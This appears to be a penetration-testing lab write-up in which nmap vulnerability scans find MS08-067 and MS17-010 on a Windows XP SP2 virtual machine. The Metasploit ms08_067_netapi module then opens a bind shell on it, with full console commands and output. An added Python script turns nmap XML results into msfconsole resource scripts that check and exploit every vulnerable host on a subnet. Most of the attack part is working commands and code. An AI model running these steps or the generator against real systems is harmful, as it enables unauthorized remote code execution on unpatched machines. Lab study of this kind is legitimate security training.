The pentest host runs Linux with two tools installed: nmap and msfconsole. nmap is used to scan the target: the ports the system has open, the OS version, and which hosts on the LAN carry known vulnerabilities; msfconsole is used for the exploitation itself.
The target is Windows XP SP2, installed as a KVM virtual machine on the same Linux host.
Start with nmap from the Linux host. The host uses a virtual bridge to the VM, so the two are on the same network; for the scan to show anything, both the host firewall and the target's firewall have to let the traffic through (XP SP2 turns Windows Firewall on by default, and with it enabled ports 135/139/445 come back filtered and the SMB vuln scripts have nothing to test). The scan command, run as root because the SYN scan (-sS) and OS detection (-O) need raw sockets:
nmap -O -sS --script=vuln 192.168.122.112
Because the target's IP, 192.168.122.112, was known in advance there was no need to sweep the subnet first. The sweep command would have been:
nmap -sT 192.168.122.1/24
That is a TCP connect scan (full three-way handshake) of the /24; it does not need root, at the cost of completing every handshake, so each connection shows up in the services' logs. The results of the vuln scan above:
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-02 18:07 CST
Nmap scan report for 192.168.122.112
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 52:54:00:C4:B0:EE (QEMU virtual NIC)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2
Network Distance: 1 hop
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.14 seconds
The scan reports two vulnerabilities: MS08-067 and MS17-010 (EternalBlue). Taking MS17-010 first, the Metasploit modules for it and the targets of the EternalBlue module:
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Only Windows 7 and Server 2008 R2 (x64) are listed, so that module does not fit this XP target and was not used for the test; when it was tried against the XP box anyway it just kept blue-screening the target, which is what a kernel pool corruption exploit does on a version it was not written for. (The search output also lists ms17_010_psexec, which uses the EternalRomance/EternalSynergy/EternalChampion variants rather than kernel pool corruption; its own `show targets` is the place to look before writing MS17-010 off.) MS08-067 is used for this test instead:
msf5 exploit(windows/smb/ms17_010_eternalblue) > search MS08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show playload
[-] Invalid parameter "playload", use "show -h" for more information
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom manual No Custom Payload
1 generic/debug_trap manual No Generic x86 Debug Trap
2 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline
4 generic/tight_loop manual No Generic x86 Tight Loop
5 windows/adduser man
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.122.112
rhost => 192.168.122.112
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.122.1
lhost => 192.168.122.1
msf5 exploit(windows/smb/ms08_067_netapi) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms08_067_netapi) > set generic/shell_bind_tcp
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.122.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.122.112 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Start the exploitation. Two notes on the options above: LHOST only matters for a reverse payload (generic/shell_bind_tcp listens on the target, so only RHOST and LPORT are used, as the payload options show), and `set target 10` replaces Automatic Targeting with an explicit entry from the module's `show targets` list, which distinguishes XP service packs and language builds; the index is specific to the Metasploit version, so read the list rather than copying the number. The module reports Check = Yes, so running `check` before `exploit` is a cheap way to confirm the host before sending the overflow:
msf5 exploit(windows/smb/ms08_067_netapi) > set target 10
target => 10
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] 192.168.122.112:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.122.112:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.122.112:4444) at 2020-05-02 17:59:15 +0800
dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CC72-722A
 Directory of C:\WINDOWS\system32
2020-05-02 17:33 <DIR> .
2020-05-02 17:33 <DIR> ..
2020-05-02 17:31 261 $winnt$.inf
2020-05-03 01:16 <DIR> 1025
2020-05-03 01:16 <DIR> 1028
2020-05-03 01:16 <DIR> 1031
2020-05-03 01:17 <DIR> 1033
2020-05-03 01:16 <DIR> 1037
2020-05-03 01:16 <DIR> 1041
2020-05-03 01:16 <DIR> 1042
2020-05-03 01:16 <DIR> 1054
2006-03-02 20:00 2,151 12520437.cpx
2006-03-02 20:00 2,233 12520850.cpx
Being able to run commands in the target's cmd.exe shows the exploit succeeded. The shell's output arrives in the target's OEM code page (936, GBK, on a Simplified Chinese XP), not UTF-8, so cmd.exe's non-ASCII strings appear garbled in msfconsole unless the session bytes are re-decoded as GBK; the file listing itself is unaffected. This article is intended for lab testing only.
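The whole procedure above (scan with --script=vuln, pick the Metasploit module whose targets fit the OS nmap guessed, set RHOSTS, payload and target, then check before exploit) can be scripted instead of typed. The following is an added example written for this page, not code from the original post, nmap or Metasploit: it reads the XML nmap writes when the scan on the page is run with -oX, maps the two NSE findings to the modules from the search output, and emits an msfconsole resource script. The script-id-to-module table and the OS filter for eternalblue are assumptions taken from the `show targets` output above; the sample XML is constructed to mirror the scan result on the page, with an invented second Windows 7 host so that routing to eternalblue is exercised too, which goes beyond the single target on the page.

```python
"""nmap_to_rc.py: turn a saved nmap --script=vuln scan (-oX) into a Metasploit
resource script that runs `check` before `exploit`. Added example for this
write-up, not code from the post, nmap or Metasploit. Use (-sS/-O need root):
    sudo nmap -O -sS --script=vuln -oX scan.xml 192.168.122.0/24
    python3 nmap_to_rc.py scan.xml > attack.rc && msfconsole -q -r attack.rc
"""
import sys
import xml.etree.ElementTree as ET

# Assumed mapping (NSE script id, Metasploit module, OS filter), in order of
# preference. The eternalblue module in the post's msf5 only lists Windows 7 /
# Server 2008 R2 x64 targets, so it is chosen only when nmap's OS guess matches;
# an XP host flagged for both findings therefore gets MS08-067.
MODULES = [
    ("smb-vuln-ms17-010", "exploit/windows/smb/ms17_010_eternalblue",
     ("windows 7", "server 2008 r2")),
    ("smb-vuln-ms08-067", "exploit/windows/smb/ms08_067_netapi", None),
]


def parse_nmap_xml(xml_text):
    """{ip: {"os": [osmatch names], "vulns": [script ids flagged vulnerable]}}.
    Layout of nmap's vulns NSE library: a finding is a <table> under <script>
    whose <elem key="state"> reads VULNERABLE or LIKELY VULNERABLE; NOT VULNERABLE
    or a script with no table at all (ms10-054 printing "false") is skipped."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        vulns = []
        for script in host.findall("hostscript/script"):
            states = [(s.text or "").strip().upper()
                      for s in script.findall("table/elem[@key='state']")]
            if any(s.startswith(("VULNERABLE", "LIKELY VULNERABLE")) for s in states):
                vulns.append(script.get("id"))
        hosts[addr.get("addr")] = {
            "os": [m.get("name", "") for m in host.findall("os/osmatch")],
            "vulns": vulns,
        }
    return hosts


def choose_module(host):
    """First module whose finding is present and whose OS filter, if any,
    matches nmap's OS guess; None when nothing usable was reported."""
    os_text = " ".join(host["os"]).lower()
    for script_id, module, os_filter in MODULES:
        if script_id in host["vulns"] and (
                os_filter is None or any(t in os_text for t in os_filter)):
            return module
    return None


def build_rc(ip, module, payload="generic/shell_bind_tcp", lhost=None, target=None):
    """msfconsole resource-script lines for one host. `check` runs the module's
    vulnerability test first; `exploit -z` opens the session without dropping
    into it. LHOST is only needed for a reverse payload: the bind payload used
    on the page listens on the target, so only RHOSTS and LPORT matter."""
    lines = [f"use {module}", f"set RHOSTS {ip}", f"set PAYLOAD {payload}"]
    if "reverse" in payload:
        if lhost is None:
            raise ValueError("a reverse payload needs LHOST")
        lines.append(f"set LHOST {lhost}")
    if target is not None:  # explicit `show targets` entry, as in the page's `set target 10`
        lines.append(f"set target {target}")
    return lines + ["check", "exploit -z"]


def plan(xml_text, **rc_opts):
    """One rc block per host with a usable finding; hosts with nothing
    exploitable are kept as comments so they are not silently dropped."""
    out = []
    for ip, host in parse_nmap_xml(xml_text).items():
        module = choose_module(host)
        if module is None:
            out.append(f"# {ip}: nothing usable ({', '.join(host['vulns']) or 'no findings'})")
        else:
            out += build_rc(ip, module, **rc_opts)
    return out


# Constructed sample modelled on the scan in the post (XP SP2 target with
# MS08-067 and MS17-010 flagged, ms10-054 negative) plus an invented Windows 7
# host with only MS17-010, to exercise the OS-based routing.
SAMPLE_XML = """<nmaprun scanner="nmap" version="7.60">
<host><address addr="192.168.122.112" addrtype="ipv4"/>
<os><osmatch name="Microsoft Windows XP SP2 or SP3, or Windows Server 2003" accuracy="100"/></os>
<hostscript>
<script id="smb-vuln-ms08-067" output="VULNERABLE"><table key="CVE-2008-4250"><elem key="state">LIKELY VULNERABLE</elem></table></script>
<script id="smb-vuln-ms10-054" output="false"/>
<script id="smb-vuln-ms17-010" output="VULNERABLE"><table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table></script>
</hostscript></host>
<host><address addr="192.168.122.113" addrtype="ipv4"/>
<os><osmatch name="Microsoft Windows 7 SP1" accuracy="100"/></os>
<hostscript>
<script id="smb-vuln-ms17-010" output="VULNERABLE"><table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table></script>
</hostscript></host>
</nmaprun>
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("\n".join(plan(text)))
```

With no argument the script prints the plan for the built-in sample; with a real scan.xml it writes one block per host. `show targets` remains the gate for OS fit, which is what the blue-screening EternalBlue attempt above ran into, while `check` in the generated script is the gate for whether that particular host still answers as vulnerable at the moment the exploit is thrown.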